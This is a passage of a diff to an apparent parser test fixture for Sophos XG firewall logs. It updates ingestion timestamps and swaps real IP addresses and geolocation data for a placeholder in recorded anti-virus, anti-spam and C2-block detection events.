sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041122613010", "kind": "event", @@ -922,7 +919,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566106700Z", + "ingested": "2021-12-09T13:44:55.714843900Z", "original": "device=\"SFW\" date=2018-06-06 time=12:53:39 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041123413012 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Dos\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"\" to_email_address=\"\" email_subject=\"\" mailid=\"\" mailsize=0 spamaction=\"TMPREJECT\" reason=\"SMTP DoS\" src_domainname=\"\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041123413012", "kind": "alert", @@ -1016,7 +1013,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566112500Z", + "ingested": "2021-12-09T13:44:55.714849800Z", "original": "device=\"SFW\" date=2018-06-06 time=12:56:53 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041102413014 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Denied\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil1@postman.local\" to_email_address=\"pankhil@postman. local\" email_subject=\"Fwd: test sand\" mailid=\"c0000008-1528270010\" mailsize=419835 spamaction=\"DROP\" reason=\"Email is marked Malicious by Sophos Sandstorm.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0", "code": "041102413014", "kind": "alert", @@ -1112,7 +1109,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566118100Z", + "ingested": "2021-12-09T13:44:55.714855600Z", "original": "device=\"SFW\" date=2017-01-31 time=18:31:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041207414001 log_type=\"Anti-Spam\" log_component=\"POP3\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"GauravPatel\" from_email_address=\"gaurav1@iview.com\" to_email_address=\"gaurav2@iview. com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003c2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com\u003e\" mailsize=574 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"iview.com\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041207414001", "kind": "alert", @@ -1133,41 +1130,57 @@ "server": { "port": 80, "bytes": 1616, - "ip": "13.226.155.93" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 1616, - "ip": "13.226.155.93" + "ip": "175.16.199.1" }, "rule": { "id": "2" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57695, "bytes": 550, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/Sandstorm/SBTestFile1.pdf", @@ -1194,8 +1207,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.24", - "13.226.155.93" + "175.16.199.1" ] }, "sophos": { @@ -1219,7 +1231,7 @@ "client": { "port": 57695, "bytes": 550, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "http": { "response": { @@ -1228,8 +1240,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566122100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", + "ingested": "2021-12-09T13:44:55.714861800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", "action": "Virus", @@ -1252,41 +1264,57 @@ "server": { "port": 80, "bytes": 553, - "ip": "13.226.155.18" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 553, - "ip": "13.226.155.18" + "ip": "175.16.199.1" }, "rule": { "id": "2" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57835, "bytes": 541, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/eicar/index.html", @@ -1313,8 +1341,7 @@ "testhost.local" ], "ip": [ - "172.16.34.24", - "13.226.155.18" + "175.16.199.1" ] }, "sophos": { @@ -1338,7 +1365,7 @@ "client": { "port": 57835, "bytes": 541, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "http": { "response": { @@ -1347,8 +1374,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566126300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol=\"TCP\" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", + "ingested": "2021-12-09T13:44:55.714867800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", "action": "Virus", @@ -1371,25 +1398,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "186.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "South America", - "country_name": "Uruguay", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -56.0, - "lat": -33.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "UY" + "country_iso_code": "CN" }, "as": { - "number": 19422, + "number": 4837, "organization": { - "name": "Telefonica Moviles del Uruguay SA" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1397,25 +1426,27 @@ "email": "info@elastic-user.local" }, "bytes": 0, - "ip": "186.8.209.194" + "ip": "175.16.199.1" }, "rule": { "id": "22" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 8560, + "number": 4837, "organization": { - "name": "1\u00261 Ionos Se" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 56336, @@ -1423,7 +1454,7 @@ "email": "info@farasamed.com" }, "bytes": 0, - "ip": "82.165.194.211" + "ip": "175.16.199.1" }, "url": { "domain": "farasamed.com" @@ -1449,8 +1480,7 @@ "defaulttest.local" ], "ip": [ - "82.165.194.211", - "186.8.209.194" + "175.16.199.1" ] }, "sophos": { @@ -1478,12 +1508,12 @@ "client": { "port": 56336, "bytes": 0, - "ip": "82.165.194.211" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566130Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", + "ingested": "2021-12-09T13:44:55.714958Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", "action": "Virus", @@ -1503,25 +1533,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.7.209.194" + "ip": "175.16.199.1" }, "log": { "level": "critical" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 42652, + "number": 4837, "organization": { - "name": "inexio Informationstechnologie und Telekommunikation Gmbh" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1529,28 +1561,27 @@ "email": "info@elastic-user.local" }, "bytes": 0, - "ip": "185.7.209.194" + "ip": "175.16.199.1" }, "rule": { "id": "22" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3004, - "lat": 47.4902 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 54290, + "number": 4837, "organization": { - "name": "Hostwinds LLC." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 54693, @@ -1558,7 +1589,7 @@ "email": "spedizioni@divella.it" }, "bytes": 0, - "ip": "23.254.247.78" + "ip": "175.16.199.1" }, "url": { "domain": "divella.it" @@ -1584,8 +1615,7 @@ "testhost.local" ], "ip": [ - "23.254.247.78", - "185.7.209.194" + "175.16.199.1" ] }, "sophos": { @@ -1613,12 +1643,12 @@ "client": { "port": 54693, "bytes": 0, - "ip": "23.254.247.78" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566135400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", + "ingested": "2021-12-09T13:44:55.715010100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", "action": "Virus", @@ -1719,7 +1749,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566140900Z", + "ingested": "2021-12-09T13:44:55.715016400Z", "original": "device=\"SFW\" date=2018-06-06 time=10:51:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036106211001 log_type=\"Anti-Virus\" log_component=\"POPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil@postman.local\" subject=\"EICAR\" mailid=\"\u003ca5c35e4b-1198-d0eb-0763-c0d5af3c817e@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036106211001", "kind": "alert", @@ -1821,7 +1851,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566147800Z", + "ingested": "2021-12-09T13:44:55.715022700Z", "original": "device=\"SFW\" date=2018-06-06 time=10:58:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036206212001 log_type=\"Anti-Virus\" log_component=\"IMAPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"ganga@postman.local\" subject=\"EICAR test email\" mailid=\"\u003c2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036206212001", "kind": "alert", @@ -1915,7 +1945,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566155500Z", + "ingested": "2021-12-09T13:44:55.715028700Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:23 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031006209001 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" virus=\"EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload\" filename=\" /home/ftp-user/ta_test_file_1ta-cl1-46\" file_size=0 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"STOR\" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol=\"TCP\" src_port=39910 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=0", "code": "031006209001", "kind": "alert", @@ -2007,7 +2037,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566163200Z", + "ingested": "2021-12-09T13:44:55.715034600Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:48 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031001609002 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" virus=\"\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download\" filename=\"/home/ftp-user /ta_test_file_1ta-cl1-46\" file_size=19926248 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"RETR\" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol=\"TCP\" src_port=39936 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=19926248", "code": "031001609002", "kind": "event", @@ -2025,29 +2055,31 @@ { "server": { "port": 80, - "ip": "46.161.30.47" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RU" + "country_iso_code": "CN" }, "as": { - "number": 44050, + "number": 4837, "organization": { - "name": "Petersburg Internet Network ltd." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "46.161.30.47" + "ip": "175.16.199.1" }, "source": { "port": 22623, @@ -2057,7 +2089,7 @@ "ip": "10.198.47.71" }, "url": { - "original": "46.161.30.47" + "original": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2084,7 +2116,7 @@ ], "ip": [ "10.198.47.71", - "46.161.30.47" + "175.16.199.1" ] }, "sophos": { @@ -2109,8 +2141,8 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566170900Z", - "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715040600Z", + "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086304418010", "kind": "alert", "action": "drop", @@ -2129,36 +2161,52 @@ { "server": { "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57579, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/callhome/index.html" @@ -2184,8 +2232,7 @@ "testhost.local" ], "ip": [ - "172.16.34.24", - "13.226.155.22" + "175.16.199.1" ] }, "sophos": { @@ -2206,12 +2253,12 @@ }, "client": { "port": 57579, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566178500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715046500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", "action": "drop", @@ -2230,36 +2277,52 @@ { "server": { "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "13.226.155.22" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 57540, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "url": { "original": "http://sophostest.com/callhome/index.html" @@ -2285,8 +2348,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.24", - "13.226.155.22" + "175.16.199.1" ] }, "sophos": { @@ -2307,12 +2369,12 @@ }, "client": { "port": 57540, - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566186100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715052600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", "action": "drop", @@ -2331,36 +2393,38 @@ { "server": { "port": 0, - "ip": "82.211.30.202" + "ip": "175.16.199.1" }, "log": { "level": "notification" }, "destination": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 31400, + "number": 4837, "organization": { - "name": "Accelerated IT Services \u0026 Consulting GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, - "ip": "82.211.30.202" + "ip": "175.16.199.1" }, "source": { "port": 0, "ip": "10.198.32.89" }, "url": { - "original": "82.211.30.202" + "original": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2384,7 +2448,7 @@ ], "ip": [ "10.198.32.89", - 